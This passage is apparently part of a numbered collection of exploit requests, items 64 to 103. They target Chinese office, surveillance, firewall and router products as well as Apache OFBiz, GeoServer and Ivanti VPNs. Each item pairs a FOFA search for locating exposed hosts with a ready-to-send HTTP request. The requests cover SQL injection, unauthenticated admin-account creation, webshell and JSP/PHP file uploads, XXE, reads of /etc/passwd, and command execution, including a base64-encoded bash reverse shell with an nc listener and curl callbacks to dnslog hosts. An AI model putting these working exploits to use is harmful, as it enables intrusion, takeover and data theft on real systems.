path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed when lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom and broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (Qi An Xin) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin (Legendsec) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

